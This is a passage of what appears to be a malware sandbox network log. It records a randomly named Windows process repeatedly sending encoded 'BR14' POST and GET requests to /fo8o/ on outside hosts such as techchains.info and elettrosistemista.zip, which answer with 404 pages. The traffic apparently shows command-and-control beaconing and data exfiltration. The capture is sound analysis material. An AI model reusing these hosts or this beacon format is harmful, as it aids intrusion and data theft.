BR14=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xV9A6hQWvbjAFWX3+4RRRtHJXJPdgw==
Dec 31, 2024 09:31:13.409526110 CET	637	IN	HTTP/1.1 404 Not Found Date: Tue, 31 Dec 2024 08:31:13 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49729	66.29.149.46	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:31:15.347074986 CET	1807	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 6c 4d 79 39 68 4d 77 6e 74 50 62 42 6b 57 43 67 36 34 30 57 38 69 68 53 35 4c 52 2b 34 76 2f 70 31 59 78 43 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 4e 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 [TRUNCATED] Data Ascii: BR14=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1ylMy9hMwntPbBkWCg640W8ihS5LR+4v/p1YxCS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JVW7MNLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvphzvXwoYgEGGBegBYUvD1M4KwhiKDjBkp5+8SjFpcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyNSNQdnD3Hhu1yTgz3358X5L3gwcN97/Tb8N80icRXci1wr2COz0bZo7UTHqzveHPd9mGha/5UkAaFDdAGV63Cf7j9sjapGbKqVEELpeL1i5bL26YgFxdJ5lNe+YT3YM9OlmqmD2UJvkBz+Bc7UEo30kuFMjx6+WkCWK2ptB2H5iPaOQmCiRUqguRsCCOR2XyV9r3bDe3Sr9DPwPncsYVk9OL/Bv2E6pDKZYkrTbNINFJsu3c9ylUJebX8j0GvZM58iiJRQth4q3gRhoqoWCVtpgo9JFAiREu3rTFL5UpGn8/ZdHL9W43MHFoRVYrBD8x6PTPO6hRpoJyuTrBbwNSv6d6/nvZWY5e07G5Z1M5OOaYc6G0R6X0aPT/iAJfN9F3ZSpq405nTPHH/dSOAdhN9HXvbWu4C99PUt6i5zjlVNQMHfw+F4e1tKVx6sazM4VNid74ESLno1paGPXJ4L2bMuXlKtbZXlBBCPQEWfVOAjAuvjpTESHd/c4P/tkXx1BG4JN14e4AV+TG3xTSQ [TRUNCATED]
Dec 31, 2024 09:31:15.958642006 CET	637	IN	HTTP/1.1 404 Not Found Date: Tue, 31 Dec 2024 08:31:15 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49730	66.29.149.46	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:31:17.878235102 CET	502	OUT	GET /fo8o/?BR14=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa4RxULGVWJLXVKOGZXf4u2rY2O36g==&D0=YnO0xF1X40 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 31, 2024 09:31:18.475411892 CET	652	IN	HTTP/1.1 404 Not Found Date: Tue, 31 Dec 2024 08:31:18 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49731	195.110.124.133	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:31:23.577223063 CET	788	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 6a 6a 30 4e 78 49 41 77 57 76 65 45 77 52 59 6f 58 4d 5a 68 46 6d 37 78 76 39 74 5a Data Ascii: BR14=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCjj0NxIAwWveEwRYoXMZhFm7xv9tZ
Dec 31, 2024 09:31:24.247057915 CET	367	IN	HTTP/1.1 404 Not Found Date: Tue, 31 Dec 2024 08:31:24 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49732	195.110.124.133	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:31:26.114073992 CET	812	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 37 57 6f 61 6b 78 51 2f 32 65 39 37 32 4a 59 4c 6b 39 35 71 4b 52 72 49 4f 79 4d 77 3d 3d Data Ascii: BR14=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qx7WoakxQ/2e972JYLk95qKRrIOyMw==
Dec 31, 2024 09:31:26.789151907 CET	367	IN	HTTP/1.1 404 Not Found Date: Tue, 31 Dec 2024 08:31:26 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49733	195.110.124.133	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:31:28.647092104 CET	1825	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 53 66 2f 72 36 30 53 61 49 71 73 39 59 76 43 4b 61 34 34 35 6f 33 44 76 49 62 39 54 72 53 68 7a 2b 48 2b 33 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 75 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 [TRUNCATED] Data Ascii: BR14=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKSf/r60SaIqs9YvCKa445o3DvIb9TrShz+H+33Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHXRpuuCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adY6OJWb476q0Q+bmb0hnKbf3THxmaenEfiuVQsu72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQcK9lYv/+N+PrZONYNpoKQ3sl0IXC/6zU+xq1fwgr8JNRREYVA3EdubrLvbVAmdhN31HB/ss4RWFPyLbsWJLUzEnXPe1lGGaAWFmFlU93uOS1kDu3bF4b2qDR6/B3Emt03agN9gQR47Gjngmx75oDUvuHJdMx3unliDVtUUuUx+T6ZwkQ83ttmL+LkzJB/gRXNcZCRbkYzd4sgtFhmt0zW8zVzt2k4nTaUmpijYjt9X7jQoTlV3MLEXOnroC6lSo2/Pk9bxAdDpyI2r9pwtLn0gP/gQMCXUrX/8fUAD0rc2PuXcYVXQWoUr8OiRYVlzSKzFUMRP/iM/KEOh23lyLwgNyNEVUwpkBu7eOTCESBnhlnkmxEj/lwX3ZCt2+MyRQYVaqS9ZRRbWGVxfe61Y/LPQWm4ZdZKNR4ANzg7yMXVo3Bo3qaOXY9ZGxPl3lVs+KREYNWe3Ad+KWBkN+MPqYmspTk0KzcuTJZvnfFQgRMQiDoxgPXZD2djHlKfng0LgcZGbFwMA1yLD58SELd [TRUNCATED]
Dec 31, 2024 09:31:29.321794033 CET	367	IN	HTTP/1.1 404 Not Found Date: Tue, 31 Dec 2024 08:31:29 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	49734	195.110.124.133	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:31:31.189045906 CET	508	OUT	GET /fo8o/?D0=YnO0xF1X40&BR14=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 31, 2024 09:31:31.922432899 CET	367	IN	HTTP/1.1 404 Not Found Date: Tue, 31 Dec 2024 08:31:31 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	49735	217.196.55.202	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
